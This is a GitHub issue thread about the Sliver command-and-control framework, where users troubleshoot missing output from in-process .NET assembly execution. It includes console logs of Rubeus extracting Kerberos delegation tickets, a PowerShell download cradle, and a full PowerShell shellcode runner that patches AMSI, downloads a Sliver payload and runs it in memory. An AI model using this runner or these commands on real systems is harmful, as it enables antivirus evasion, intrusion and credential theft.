sliver icon indicating copy to clipboard operation
sliver copied to clipboard

In-process .NET assembly execution does not always return output

Open senzee1984 opened this issue 2 years ago • 19 comments

Describe the bug If the execution happens in the process, there is no output.

To Reproduce Steps to reproduce the behavior:

  1. Generate a session stager implant, and execute it.
  2. Select the session, and execute any .NET exe with option -i
  3. Observe that there is no output

Expected behavior I am not sure if it is an intended behavior for in-process execution. @MrAle98 mentioned that if --debug is enabled when generating an implant, we can see the output. Since I generated a stager implant, there is no debug option.


[server] sliver (WELL-KNOWN_UNION) > execute-assembly /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (WELL-KNOWN_UNION) > execute-assembly -i /opt/red/rubeus.exe hash /password:123

[*] Output:

Desktop (please complete the following information):

  • OS: Kali
  • Version 1.5.33

Additional context The session is obtained from a stager session implant.

senzee1984 avatar Jan 10 '23 01:01 senzee1984

A reference:

senzee1984 avatar Jan 10 '23 01:01 senzee1984

@rkervella is this something weird to do with the stdout shenanigans?

moloch-- avatar Jan 10 '23 01:01 moloch--

Yeah I believe it's an issue with go-clr, I'll have a look.

rkervella avatar Jan 10 '23 03:01 rkervella

@ziyishen97 have you tried with the --amsi-bypass and or --etw-bypass flags?

rkervella avatar Jan 16 '23 22:01 rkervella

Removing the bug tag since I'm unable to reproduce on both Windows 11 and Windows 2019.

rkervella avatar Jan 16 '23 23:01 rkervella

The same result

sliver (STRAIGHT_WILLOW) > execute-assembly  -i -M -E /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 avatar Jan 17 '23 15:01 senzee1984

Additional information: I cannot get any output from Sliver cli, however, the output can be displayed in the process, such as the powershell cli. I used a powershell download cradle to get a session, as I execute a .NET assembly, the output is displayed in powershell cli

PS C:\Windows\system32> iex(new-object net.webclient).downloadstring('')
Downloading sliver.bin

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 Are you using the fork May i suggest to you to first try with the latest release of sliver and check if you still get the issue?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

@MrAle98 I am using the latest version, and manually modified few files to include the powershell command

All hackers gain exalted
[*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 Do you keep getting the same issue also without your modifications? Do you have the same issue with beacon type implants?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

I tried with latest binary release, it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 among your modifications is there anything that modifies the implant?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

@MrAle98 I made modifications based on the comparison

senzee1984 avatar Jan 17 '23 16:01 senzee1984

@ziyishen97 In the branch you taken there are no modifications on the implant side. It is weird that adding the modifications you can't retrieve the output...

MrAle98 avatar Jan 17 '23 16:01 MrAle98

Okay, I find there is inconsistence between sessions. I am using the official latest version. The SYSTEM session has output, while other users' session (including local admin) do not have. @MrAle98

[server] sliver (AGREEABLE_SPIRITUAL) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

[*] rto has joined the game

[*] rto has joined the game

[server] sliver (AGREEABLE_SPIRITUAL) > sessions

 ID         Transport   Remote Address       Hostname   Username              Operating System   Health  
========== =========== ==================== ========== ===================== ================== =========
 1e58be58   http(s)   web01      CHILD\david           windows/amd64      [ALIVE] 
 21084a77   http(s)   web01      NT AUTHORITY\SYSTEM   windows/amd64      [ALIVE] 
 cf73a9d6   http(s)   web01      CHILD\eric            windows/amd64      [ALIVE] 
 a94ef7ea   http(s)   web01      CHILD\eric            windows/amd64      [ALIVE] 

[server] sliver (AGREEABLE_SPIRITUAL) > use 21084a77-c18c-4bf6-8a7d-5addda81f83a

[*] Active session STRAIGHT_WILLOW (21084a77-c18c-4bf6-8a7d-5addda81f83a)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (STRAIGHT_WILLOW) > use cf73a9d6-2324-4eb5-8602-393091a2fe9c

[*] Active session STRAIGHT_WILLOW (cf73a9d6-2324-4eb5-8602-393091a2fe9c)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 avatar Jan 17 '23 16:01 senzee1984

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session is obtained by executing a powershell shellcode runner

[server] sliver (ILL_FURNACE) > execute-assembly /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):


[server] sliver (ILL_FURNACE) > execute-assembly --i /opt/red/rubeus.exe tgtdeleg /nowrap
error: invalid flag: --i
[server] sliver (ILL_FURNACE) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

The contents of the powershell shellcode runner

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))

function getDelegateType {
    Param (
     [Parameter(Position = 0, Mandatory = $True)] [Type[]]
     $func, [Parameter(Position = 1)] [Type] $delType = [Void]
    $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
    DefineDynamicModule('InMemoryModule', $false).
    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
    AutoClass', [System.MulticastDelegate])

    DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
     SetImplementationFlags('Runtime, Managed')

    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()

[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]] (0x48, 0x31, 0xC0) 
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)

Write-Host 'Downloading sliver.bin'
[Byte[]] $buf = (New-Object Net.Webclient).DownloadData('')
$lpMem =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $buf.length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)

However, it looks like only stager implant has this issue, stageless implant or spawned session (getsystem) does not have.

[server] sliver (ILL_FURNACE) > generate --http -f exe --debug --save /opt/red/sliver.exe

[*] Generating new windows/amd64 implant binary
[*] Build completed in 15s
[*] Implant saved to /opt/red/sliver.exe

[*] Session d7040874 ABSOLUTE_ADULTHOOD - (web01) - windows/amd64 - Tue, 24 Jan 2023 18:32:36 PST

[server] sliver (ILL_FURNACE) > use d7040874-2ab9-4e04-b55a-3eaabc7c539f

[*] Active session ABSOLUTE_ADULTHOOD (d7040874-2ab9-4e04-b55a-3eaabc7c539f)

[server] sliver (ABSOLUTE_ADULTHOOD) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):


senzee1984 avatar Jan 25 '23 02:01 senzee1984

I am also seeing this issue on v1.5.31 for both beacons and sessions; staged and stageless.

[*] Server v1.5.31 - d699a8d1401f89fc235cb4bfc4cf58feee87308a - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

Output DOES appear when the shellcode loader is a Console Application, but does NOT return in Sliver console.

gregohmyeggo avatar Feb 27 '23 15:02 gregohmyeggo

The go-clr library we're using has been updated, and might fix some of these issues. @senzee1984 @gregohmyeggo if you're feeling adventurous, you can try to compile from the master branch and test it out.

rkervella avatar Mar 02 '23 22:03 rkervella

Getting the same behavior on v1.5.41

Freshly compiled Seatbelt, --in-process does not yield any output while without this option, it behaves as intended. Apologies for the lack of troubleshooting done on my end, just putting this for tracking.

The implant process is a .NET 6.0 console app, tried in an interactive session.


Tested another implant, .NET 7.0, single-file self-contained published assembly, and I got the output back on both session and beacon.

Selora avatar Dec 02 '23 23:12 Selora